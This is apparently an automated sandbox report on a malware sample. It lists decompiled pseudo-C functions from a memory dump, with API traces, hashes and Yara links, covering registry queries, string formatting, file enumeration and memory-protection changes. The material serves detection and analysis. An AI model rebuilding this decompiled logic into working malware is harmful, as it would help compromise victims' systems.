Function 04775988, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E04775988(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04775C4E(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x04775994
0x04775998
0x04775999
0x0477599a
0x0477599c
0x0477599e
0x047759a3
0x047759a6
0x04775a3d
0x04775a44
0x04775a44
0x047759af
0x047759b6
0x047759c6
0x047759c6
0x047759cc
0x047759ce
0x047759d3
0x047759dc
0x047759e4
0x047759e7
0x047759f2
0x047759f6
0x047759f8
0x047759f9
0x04775a02
0x04775a06
0x04775a17
0x04775a08
0x04775a0d
0x04775a12
0x04775a21
0x04775a21
0x047759f6
0x04775a27
0x04775a2d
0x04775a2d
0x04775a36
0x04775a3b
0x04775a3b
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 047759B6
lstrlenW.KERNEL32(?), ref: 047759EC
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 04775A0D
SysFreeString.OLEAUT32(?), ref: 04775A21

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 450f00ec454881c30cb6e229a057f65516881e0a9d9cc230c9258d8abf0f6962
Instruction ID: ad12b21943f11b8deb79193bf56c6c768238314d4e40ffcfb62e2e724ad85872
Opcode Fuzzy Hash: 450f00ec454881c30cb6e229a057f65516881e0a9d9cc230c9258d8abf0f6962
Instruction Fuzzy Hash: C9213175A01209FFDB10DFA4C8889DEBBB8FF48304B518569E945E7300E730AA05CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04774A3C, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04774A3C(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E04774380(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x477a2d0; // 0x96d5a8
				_t4 = _t24 + 0x477bd90; // 0x50e9338
				_t5 = _t24 + 0x477bd38; // 0x4f0053
				_t26 = E047730AD( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x477a2d0; // 0x96d5a8
						_t11 = _t32 + 0x477bd84; // 0x50e932c
						_t48 = _t11;
						_t12 = _t32 + 0x477bd38; // 0x4f0053
						_t55 = E04774DC8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0x477a2d0; // 0x96d5a8
							_t13 = _t35 + 0x477bdce; // 0x30314549
							if(E04775EC8(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
								_t61 =  *0x477a2b4 - 6;
								if( *0x477a2b4 <= 6) {
									_t42 =  *0x477a2d0; // 0x96d5a8
									_t15 = _t42 + 0x477bbda; // 0x52384549
									E04775EC8(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0x477a2d0; // 0x96d5a8
							_t17 = _t38 + 0x477bdc8; // 0x50e9370
							_t18 = _t38 + 0x477bda0; // 0x680043
							_t45 = E047733B7(_v8, 0x80000001, _t55, _t18, _t17);
							HeapFree( *0x477a290, 0, _t55);
						}
					}
					HeapFree( *0x477a290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04773EFA(_t54);
				}
				return _t45;
			}

0x04774a3c
0x04774a4c
0x04774a4f
0x04774a56
0x04774a58
0x04774a58
0x04774a5b
0x04774a60
0x04774a67
0x04774a74
0x04774a79
0x04774a7d
0x04774a8b
0x04774a99
0x04774a9d
0x04774b2e
0x04774b2e
0x04774aa3
0x04774aa3
0x04774aa8
0x04774aa8
0x04774aaf
0x04774abb
0x04774abd
0x04774abf
0x04774ac1
0x04774ac8
0x04774ada
0x04774adc
0x04774ae3
0x04774ae5
0x04774aec
0x04774af7
0x04774af7
0x04774ae3
0x04774afc
0x04774b01
0x04774b08
0x04774b26
0x04774b28
0x04774b28
0x04774abf
0x04774b3a
0x04774b3a
0x04774b3c
0x04774b41
0x04774b43
0x04774b43
0x04774b4e

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,050E9338,00000000,?,73BCF710,00000000,73BCF730), ref: 04774A8B
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,050E9370,?,00000000,30314549,00000014,004F0053,050E932C), ref: 04774B28
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04771BD5), ref: 04774B3A

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 53e2e29b56442f0f2506961499b93b4036e5617650efab7c0c923de0b7472f6a
Instruction ID: 431988fe9f443527a6dc28200c7a9f8bf25e7c90fdaa5edddd2c3915fe9ced59
Opcode Fuzzy Hash: 53e2e29b56442f0f2506961499b93b4036e5617650efab7c0c923de0b7472f6a
Instruction Fuzzy Hash: 0C314D72600208FEEF119BA5DD88EEE7BB8EF44304F958065E605A7261D675BE04DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0477243C, Relevance: 4.6, APIs: 3, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0477243C(intOrPtr* __eax, void* __ecx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0x477a2d0; // 0x96d5a8
				_t2 = _t22 + 0x477b671; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0x477a2a4 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x477a2a4 =  *0x477a2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E04773F12(_t49, _t48); // executed
					_t33 = E047745E6(_t46, _t48, _t49); // executed
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0x477a2a4 < 5) {
							 *0x477a2a4 =  *0x477a2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E04772813();
					RtlFreeHeap( *0x477a290, 0, _t48); // executed
					goto L9;
				}
				_t50 =  *0x477a390; // 0x50e8d6c
				if(RtlAllocateHeap( *0x477a290, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E04776DB7(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
				goto L5;
			}

0x0477243c
0x04772443
0x0477244a
0x0477244e
0x04772453
0x0477245e
0x0477246e
0x047724b1
0x047724b5
0x047724b9
0x047724ba
0x047724bd
0x047724c2
0x047724c2
0x047724c5
0x047724c9
0x04772503
0x04772503
0x04772509
0x04772510
0x04772510
0x047724cb
0x047724ce
0x047724d0
0x047724dd
0x047724df
0x047724e6
0x0477251d
0x04772522
0x04772524
0x04772526
0x04772526
0x00000000
0x04772524
0x047724e8
0x047724ef
0x047724fd
0x00000000
0x047724fd
0x04772470
0x0477248b
0x047724a5
0x00000000
0x047724a5
0x0477249e
0x00000000

APIs

wsprintfA.USER32 ref: 0477245E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04772483

Part of subcall function 04776DB7: GetTickCount.KERNEL32 ref: 04776DCE
Part of subcall function 04776DB7: wsprintfA.USER32 ref: 04776E1B
Part of subcall function 04776DB7: wsprintfA.USER32 ref: 04776E38
Part of subcall function 04776DB7: wsprintfA.USER32 ref: 04776E58
Part of subcall function 04776DB7: wsprintfA.USER32 ref: 04776E76
Part of subcall function 04776DB7: wsprintfA.USER32 ref: 04776E99
Part of subcall function 04776DB7: wsprintfA.USER32 ref: 04776EBA

RtlFreeHeap.NTDLL(00000000,04771C1F,?,?,04771C1F,?), ref: 047724FD

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: wsprintf$Heap$AllocateCountFreeTick
String ID:
API String ID: 2794511967-0
Opcode ID: 961b1ef8afc004e3f6125a5928f865adaf3fe16c9aebafb9f61d9183ae794bba
Instruction ID: 4dff6126869e984c28c226faae15795e418048fbbd1672cddfda5d8644920101
Opcode Fuzzy Hash: 961b1ef8afc004e3f6125a5928f865adaf3fe16c9aebafb9f61d9183ae794bba
Instruction Fuzzy Hash: E0313A71600109EFEF11DF64D984ADE3BB8FB48354F908462FA15AB241E778A954CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0477274E, Relevance: 4.6, APIs: 3, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E0477274E(void* __ecx, signed char* _a4) {
				signed int _v8;
				void* _v12;
				void* _t13;
				signed short _t16;
				signed int _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t22;
				void* _t23;
				signed short* _t26;
				void* _t27;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr* _t31;

				_t31 = __imp__;
				_t23 = 0;
				_v8 = 1;
				_t28 = 0x477a380;
				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
				while(1) {
					_t13 = E04774E9C(_a4,  &_v12); // executed
					if(_t13 == 0) {
						break;
					}
					_push(_v12);
					_t19 = 0xd;
					_t20 = E047733FA(_t19);
					if(_t20 == 0) {
						HeapFree( *0x477a290, 0, _v12);
						break;
					} else {
						 *_t28 = _t20;
						_t28 = _t28 + 4;
						_t23 = _t23 + 1;
						if(_t23 < 3) {
							continue;
						} else {
						}
					}
					L7:
					 *_t31(1);
					if(_v8 != 0) {
						_t26 =  *0x477a388; // 0x50e9c78
						_t16 =  *_t26 & 0x0000ffff;
						if(_t16 < 0x61 || _t16 > 0x7a) {
							_t17 = _t16 & 0x0000ffff;
						} else {
							_t17 = (_t16 & 0x0000ffff) - 0x20;
						}
						 *_t26 = _t17;
					}
					return _v8;
				}
				_v8 = _v8 & 0x00000000;
				goto L7;
			}

0x04772755
0x0477275c
0x0477275f
0x04772766
0x0477276b
0x0477276d
0x04772774
0x0477277b
0x00000000
0x00000000
0x0477277d
0x04772782
0x04772783
0x0477278a
0x047727a4
0x00000000
0x0477278c
0x0477278c
0x0477278e
0x04772791
0x04772795
0x00000000
0x00000000
0x04772797
0x04772795
0x047727ae
0x047727b0
0x047727b6
0x047727b8
0x047727be
0x047727c5
0x047727d5
0x047727cd
0x047727d0
0x047727d0
0x047727d8
0x047727d8
0x047727e2
0x047727e2
0x047727aa
0x00000000

APIs

Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0477276B

Part of subcall function 04774E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3,0477A380), ref: 04774EC7
Part of subcall function 04774E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 04774EE9
Part of subcall function 04774E9C: memset.NTDLL ref: 04774F03
Part of subcall function 04774E9C: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04774F41
Part of subcall function 04774E9C: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04774F55
Part of subcall function 04774E9C: FindCloseChangeNotification.KERNELBASE(?), ref: 04774F6C
Part of subcall function 04774E9C: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04774F78
Part of subcall function 04774E9C: lstrcat.KERNEL32(?,642E2A5C), ref: 04774FB9
Part of subcall function 04774E9C: FindFirstFileA.KERNELBASE(?,?), ref: 04774FCF

Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 047727B0

Part of subcall function 047733FA: lstrlen.KERNEL32(?,0477A380,73BB7FC0,00000000,04772788,?,?,?,?,?,04773EAC,?), ref: 04773403
Part of subcall function 047733FA: mbstowcs.NTDLL ref: 0477342A
Part of subcall function 047733FA: memset.NTDLL ref: 0477343C

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,04773EAC,?), ref: 047727A4

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: Wow64$FileHeap$AllocateEnableFindRedirectionmemset$ChangeCloseCreateFirstFreeNotificationTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 1489712272-0
Opcode ID: 7f32c56861db1cea9198d12ea8091253a0deab1cdf61f315dfdea1c05b0f33bb
Instruction ID: 4d0ae9d48b700568e1c89b595b7df8b0d09316d5335707fccdbd7030a074cf78
Opcode Fuzzy Hash: 7f32c56861db1cea9198d12ea8091253a0deab1cdf61f315dfdea1c05b0f33bb
Instruction Fuzzy Hash: 8C11E175600208EBFF009BA5CE84BEC77BCEB04325FD040A2E601D6281D379BD91DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0477779E, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0477779E(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0x477a2d0; // 0x96d5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0x477ba60; // 0x4f0053
				_v16 = 4;
				_t31 = E04774C7C(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0x477a2d0; // 0x96d5a8
					_t5 = _t19 + 0x477babc; // 0x6e0049
					_t34 = E04774C7C(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E04772A03(_t34);
					}
					E04772A03(_t31);
				}
				return _v8;
			}

0x047777a4
0x047777a9
0x047777ae
0x047777b5
0x047777c1
0x047777c5
0x047777c7
0x047777cd
0x047777d9
0x047777dd
0x047777f0
0x047777f8
0x0477780c
0x04777814
0x04777816
0x04777816
0x0477781d
0x0477781d
0x04777824
0x04777824
0x0477782a
0x0477782f
0x04777835

APIs

Part of subcall function 04774C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,047777C1,004F0053,00000000,?), ref: 04774C85
Part of subcall function 04774C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,047777C1,004F0053,00000000,?), ref: 04774CAF
Part of subcall function 04774C7C: memset.NTDLL ref: 04774CC3

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 047777F0
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 0477780C
RegCloseKey.ADVAPI32(00000000), ref: 0477781D

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: 5c8a3bdb5ed2b549f412f15b74be6971aad763417de15b09c3633d4ff22c54cc
Instruction ID: 72739a482003a3d3729da9fe62ad63cbf587987f8963fd4ae69cd5d32ff14a9d
Opcode Fuzzy Hash: 5c8a3bdb5ed2b549f412f15b74be6971aad763417de15b09c3633d4ff22c54cc
Instruction Fuzzy Hash: 8C111E72900209BBEB21DBE8DD88FEEB7BCEB44705F904459A611E7151E778FA04CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04771896, Relevance: 3.8, APIs: 3, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04771896(void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* __ebx;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed char* _t46;
				void* _t52;
				int _t54;
				void* _t56;
				void* _t57;
				void* _t58;

				_t52 = __edx;
				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t54 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E04775C4E(_t54);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x477a320, 0x110);
					_t27 =  *0x477a324; // 0x0
					_t58 = _t57 + 0xc;
					if(_t27 != 0) {
						E047775D7(_t46, _a4, 0x110, _t27, 0);
					}
					if(E04774581( &_v36) != 0) {
						_t35 = E047735A1(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t56 = _v20;
							_v36 =  *_t46;
							_v16 = E0477421A(_t56, _a8, _t52, _t46, _a12);
							 *(_t56 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0x8b4875fc
							memset(_t56, 0, _v12 - ( *_t20 & 0xf));
							_t58 = _t58 + 0xc;
							E04772A03(_t56);
						}
					}
					memset(_a4, 0, _t54);
					E04772A03(_a4);
				}
				return _v16;
			}

0x04771896
0x0477189c
0x047718a1
0x047718ae
0x047718b1
0x047718b4
0x047718bb
0x047718be
0x047718cc
0x047718d1
0x047718d6
0x047718db
0x047718e6
0x047718e6
0x047718f5
0x0477190a
0x04771911
0x04771918
0x0477191e
0x0477192c
0x04771932
0x04771935
0x04771942
0x04771947
0x0477194b
0x0477194b
0x04771911
0x04771956
0x04771961
0x04771961
0x0477196d

APIs

Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A

memcpy.NTDLL(00000000,00000110,04771C1F,04771C1F,?,?,04771C1F,?,?,047724E4,?), ref: 047718CC
memset.NTDLL ref: 04771942
memset.NTDLL ref: 04771956

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$AllocateHeapmemcpy
String ID:
API String ID: 1529149438-0
Opcode ID: 7cf46dc8815a500e9a6dec0cf2ac07b097d57019b17e8dd73477b186e21a9448
Instruction ID: 7f6a504ab42bbea1b97fb15aaf2a2bed1ff561ada698b6f4551cefce253372b6
Opcode Fuzzy Hash: 7cf46dc8815a500e9a6dec0cf2ac07b097d57019b17e8dd73477b186e21a9448
Instruction Fuzzy Hash: 99211D71A00218ABEF11AF65CC94FEEBBB8EF08654F844065F914E6351E734EA158BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04777471, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E04777471(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E0477344C(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x477a2d0; // 0x96d5a8
						_t20 = _t68 + 0x477b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E04772986(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x04777477
0x0477747a
0x0477748a
0x04777493
0x04777497
0x04777565
0x0477756b
0x0477756b
0x047774b1
0x047774b6
0x047774ba
0x047774c0
0x047774c5
0x047774cc
0x047774db
0x047774db
0x047774df
0x047774e1
0x047774ed
0x047774f8
0x04777503
0x04777507
0x04777511
0x04777515
0x04777517
0x0477751c
0x04777523
0x04777533
0x04777533
0x0477751c
0x04777515
0x04777535
0x0477753a
0x0477753f
0x0477753f
0x04777545
0x0477754b
0x04777550
0x04777550
0x04777555
0x0477755a
0x0477755a
0x04777555
0x047774df
0x0477755c
0x04777562
0x00000000

APIs

Part of subcall function 0477344C: SysAllocString.OLEAUT32(80000002), ref: 047734A3
Part of subcall function 0477344C: SysFreeString.OLEAUT32(00000000), ref: 04773508

SysFreeString.OLEAUT32(?), ref: 04777550
SysFreeString.OLEAUT32(047720DE), ref: 0477755A

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 507c67b61538b6b458c078057e5ceb51d8ba788e2a296a4d87c19173c316a77e
Instruction ID: 671e31bf2b747678690ddf517920fe3e732d06a1f4ddffae29570ce24de23093
Opcode Fuzzy Hash: 507c67b61538b6b458c078057e5ceb51d8ba788e2a296a4d87c19173c316a77e
Instruction Fuzzy Hash: 0D314972600119AFCF15DF68C888C9BBB7AFFC97447948658F915AB210E631FD51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 047741D0, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x477a294) == 0) {
						E04771547();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x477a294) == 1) {
						_t10 = E04774430(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x047741d7
0x047741d8
0x047741db
0x0477420d
0x0477420f
0x0477420f
0x047741dd
0x047741de
0x047741f3
0x047741fa
0x047741fc
0x047741fc
0x047741fa
0x047741de
0x04774217

APIs

InterlockedIncrement.KERNEL32(0477A294), ref: 047741E5

Part of subcall function 04774430: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 04774445

InterlockedDecrement.KERNEL32(0477A294), ref: 04774205

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 5dd610321fcbccf148dae310b8315d7b802fb4f1ba4872fff810fa1759d88f97
Instruction ID: b999ddb5ccc60e5b77d91f85ca48db0c4539ed87128ee700c6b215b320246927
Opcode Fuzzy Hash: 5dd610321fcbccf148dae310b8315d7b802fb4f1ba4872fff810fa1759d88f97
Instruction Fuzzy Hash: FDE04F713D412297AF211A649E08BAEA770EF41B88FC04824BB49E1350E624E861CAE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C53BBD0, Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(000000FF,?,000030FF,00000040,6D568EE0), ref: 6C53BC44

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ef85b2c8b16b7eeccdd6cb1618c8f98459a59675dd5bc257ceef3dab6fc40e20
Instruction ID: c99ef4ebb9da80943dbb46524bd1d57d40bcbcf57b470a9b152e74a9ebbec468
Opcode Fuzzy Hash: ef85b2c8b16b7eeccdd6cb1618c8f98459a59675dd5bc257ceef3dab6fc40e20
Instruction Fuzzy Hash: DA514976B012108FDF04EE69CC917AA3BB5E74E324BDB422AE509D7761E734B448CB58

Uniqueness

Uniqueness Score: -1.00%

Function 04774BFF, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E04774BFF(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
